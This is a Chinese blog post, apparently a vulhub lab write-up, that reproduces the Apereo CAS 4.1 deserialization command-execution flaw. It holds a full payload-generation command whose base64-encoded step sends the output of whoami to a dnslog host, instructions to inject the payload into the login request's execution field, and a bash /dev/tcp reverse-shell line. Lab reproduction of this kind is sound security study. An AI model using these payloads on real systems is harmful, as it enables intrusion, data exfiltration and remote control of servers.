【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现

最新推荐文章于 2024-07-30 16:53:56 发布
最新推荐文章于 2024-07-30 16:53:56 发布
阅读量686 收藏 3
点赞数
分类专栏: vulhub 文章标签: java apereo-cas
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/120257771
版权
本文详细介绍了Apereo CAS 4.1中存在的一处反序列化命令执行漏洞,涉及payload生成、DNSlog回显、登录后包修改与成功执行的步骤。攻击者通过恶意参数执行了远程代码,实现了shell反弹攻击。
摘要由CSDN通过智能技术生成

楼主困了,这里就直接写上楼主自己的一些操作
详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现

特征:

1、网站根目录下有cas目录
2、如图所示,有apereo CAS图标
在这里插入图片描述
3、如图所示,有execution传参
execution

一、先跑下目录

在这里插入图片描述

二、生成payload

http://www.jackson-t.ca/runtime-exec-payloads.html
在这里插入图片描述
工具链接:https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

三、dnslog回显

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,Y3VybCBgd2hvYW1pYC45dzJ3Z2YuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}"
标记部分就是生成的payload
在这里插入图片描述
然后我们登录CAS并抓包,将Body中的execution值替换成上面生成的Payload发送:
在这里插入图片描述

成功回显

在这里插入图片描述

五、反弹shell

和第四步一样的

把这个拿去编码后,替换,发包
bash -i >& /dev/tcp/192.168.100.34/2233 0>&1

成功反弹

在这里插入图片描述

樱浅沐冰
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞
qq_51577576的博客
10-24 1284
[ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞 Apereo CAS 是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞(硬编码导致的漏洞),进而执行任意命令
Apereo-CAS 4.1.x反序列化远程代码执行漏洞复现
afei001
03-31 610
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 Vulhub搭建漏洞环境 5.2 Apereo-CAS-Attack利用 6.漏洞修复 6.1 缓解措施 6.2 补丁升级 1.漏洞概述 Apereo CASApereo发布的集中认证服务平台,常被用于企业内部单点登录系统。CAS试图成为满足身份验证和授权需求的综合平台。CAS是一个开源且有据可查的身份验证协议。协议的主要实现是此处托管的具有相同名称的开源Java服务器组件,并支...
Apereo CAS 4.1 反序列化 RCE 漏洞复现实验报告
weixin_48400575的博客
01-25 3187
演示视频 Apereo CAS 4.1 反序列化 RCE 漏洞_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV16Y411b7T8/ 参考文章 https://vulhub.org/#/environments/apereo-cas/4.1-rce/ Apereo-cas 4.1 反序列化 RCE 漏洞_菜鸟的学习笔记-CSDN博客Apereo-cas 4.1 反序列化 RCE 漏洞一. 环境搭建使用vul
apereo-cas 4.1 反序列化命令执行漏洞 复现
YouthBelief的博客
11-22 1552
所有文章,仅供安全研究与学习之用,后果自负! apereo-cas 命令执行 4.1 apereo-cas 命令执行 4.10x01 漏洞描述0x02 影响范围0x03 漏洞复现漏洞检测漏洞利用0x04 漏洞修复 apereo-cas 命令执行 4.1 0x01 漏洞描述 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 0x02 影响范围 A
Apereo CAS 4.1 反序列化命令执行漏洞复现遇到的问题及解决过程
最新发布
deinghwl的博客
07-30 498
1,在搭建vulhub环境时,使用pip安装的docker-compose版本可能有问题,导致后续在启动容器时报错TypeError: kwargs_from_env() got an unexpected keyword argument ‘ssl_version‘,这是因为docker和docker-compose版本不兼容导致的,解决方法是重新下载一个正确版本的docker-compose(可以使用命令docker -v查看docker版本,然后在网上查询对应兼容的docker-compose版本)
复现vulhubapereo-cas4.1-rce漏洞
YX_zjp的博客
04-30 805
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统,其4.1.7版本之前存在一处默认密钥changeit的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令命令java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "mkdir 123"3、通过访问your-ip:port可以看到。6、点击登录,再通过burp suite抓包。
apereo-cas 命令执行 4.1
qq_23003811的博客
07-17 120
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。2、下载apereo-cas-attack-1.0-SNAPSHOT-all.jar。1、访问地址/cas/login,输入任意账号密码登录并使用burp抓包。4、复制生成的payload到burp,修改execution的值。5、在vps上监听7777端口,成功了flag呢?
vulhub漏洞复现-apereo-cas反序列化命令执行漏洞复现
遇事不决冲冲冲
10-05 4493
Apereo-Cas 统一认证 - Apereo CAS 简介 微服务是将单一应用程序划分成一组小的服务,服务之间互相协调、互相配合。而每个这样的小服务可能都得进行安全验证,如果每个小的服务都得独自安全验证处理的话,就太麻烦了,所以就出现了统一处理这些安全相关的认证或授权的服务,这些服务中比较出名的有Apereo CAS ,Keycloak 思路 4.1.7版本之前网站使用了Webflow框架(和wordpress差不多),漏洞出现在登陆时默认密钥changeit处,我们可以利用工具生成恶意payload
Apereo CAS 4.1 反序列化命令执行漏洞复现
玄道的网安博客
12-14 2290
漏洞概述 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 影响版本 Apereo CAS <= 4.1.7 环境搭建 这里我使用vulhub来安装环境 进入目录并安装 启动一个Apereo CAS 4.1.5: cd vulhub-master/apereo-cas/4.1-rce/ ...
CAS4.1反序列化漏洞vulhub
m0_46580995的博客
07-31 2645
CAS 复现环境vulhub Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令漏洞原理使用了默认密钥changeit public class EncryptedTranscoder implements Transcoder { private CipherBean cipherBean; private boolean co
apereo cas6.3.2可执行war,集成mysql的jdbc认证模块
03-28
Apereo CAS 6.3.2 是一个广泛使用的开源单点登录(Single Sign-On, SSO)服务器,基于 Java 技术栈构建,特别适用于教育和企业环境。它提供了安全的身份验证和授权服务,允许用户通过单一登录界面访问多个应用程序。...
java.lang.Runtime.exec() Payload知识点详解
08-24
在本篇文章里小编给大家整理的是一篇关于java.lang.Runtime.exec() Payload知识点相关内容,有兴趣的朋友们学习下。
03 - vulhub - Apereo CAS 4.1 反序列化命令执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
09-23 603
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令
Apereo CAS 4.1 反序列化命令执行漏洞
Rin_CSDN
10-17 2253
登录CAS并抓改登录包,将execution替换成上面的Payload。经过测试,生成的payload可以直接利用,对目标不限制。
红队常用命令速查
热门推荐
Hardworking666的博客
10-23 2万+
红队常用命令
干货|最全的Tomcat漏洞复现
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
09-06 1623
简介Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开...
CAS云桌面虚拟化搭建完全指南
"CAS云桌面虚拟化操作手册详细介绍了如何在测试环境中搭建CAS云桌面虚拟化系统,由重庆紫光华山智安科技有限公司的信息技术中心罗绍元编撰。手册涵盖从安装虚拟化主机、配置CAS系统到操作CAS后台、创建虚拟机以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值